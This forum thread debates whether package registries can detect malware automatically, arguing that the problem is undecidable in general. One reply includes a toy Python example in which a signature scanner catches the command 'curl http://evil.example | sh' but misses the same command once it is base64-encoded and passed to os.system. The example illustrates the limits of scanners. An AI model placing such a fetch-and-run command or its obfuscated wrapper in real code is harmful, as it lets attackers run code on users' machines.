hobofan | 5 days ago
> If automated scanning were truly effective, we'd see deployments across all major package registries.

No, we wouldn't. Most package registries are run either by bigcorps at a loss or by community maintainers (with bigcorps again sponsoring the infrastructure), and many barely go beyond the "CRUD" of package publishing due to lack of resources. The economic incentive to build supply chain security tooling into the registries themselves just isn't there.
kjok | 5 days ago | parent
You're right that registries are under-resourced. But if automated malware scanning actually worked, we'd already see big tech partnering with package registries to run continuous, ecosystem-wide scanning and detection pipelines. That isn't happening. Instead we see piecemeal efforts: Google pushing assurance artifacts (SLSA provenance, SBOMs, verifiable builds), Microsoft sponsoring OSS maintainers, Facebook donating to package registries. Notably, Google's initiatives stop short of claiming they can automatically detect malware.

That distinction matters. Malware detection is, in the general case, undecidable (think the halting problem and Rice's theorem). No amount of static or dynamic scanning can guarantee catching malicious logic in arbitrary code. At best, scanners detect known signatures, patterns, or anomalies; they can't prove the absence of malicious behavior. The toy sketch below shows how easily a pure signature check is sidestepped.

So the reality is: if Google's assurance artifacts stop short of claiming automated malware detection is feasible, it's a stretch for anyone else to suggest registries could achieve it "if they just had more resources." The problem space itself is the blocker, not just the lack of infrastructure or resources.
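To make that concrete, here's a minimal, hypothetical sketch in Python. The scanner, the signature list, and the payload string are all made up for illustration: a pattern-based check catches a payload it has a signature for, then misses the exact same payload once it's assembled at runtime instead of appearing literally in the source.

    import base64

    # Hypothetical known-bad pattern a registry scanner might blocklist.
    KNOWN_BAD_SIGNATURES = [b"curl http://evil.example | sh"]

    def signature_scan(source: bytes) -> bool:
        """Flag a package only if a known-bad byte pattern appears in it."""
        return any(sig in source for sig in KNOWN_BAD_SIGNATURES)

    # The same payload, but assembled at runtime: the published source
    # carries only a base64 blob, so the static pattern never appears in it.
    payload = b"curl http://evil.example | sh"
    obfuscated_source = (
        b"import base64, os\n"
        b"os.system(base64.b64decode(b'" + base64.b64encode(payload) + b"').decode())\n"
    )

    print(signature_scan(payload))            # True  -> caught
    print(signature_scan(obfuscated_source))  # False -> missed, identical behavior

That's the Rice's-theorem point in miniature: "does this code ever do something malicious" is a semantic property, so in general a scanner can only approximate it with syntax, signatures, and heuristics, all of which an attacker can route around.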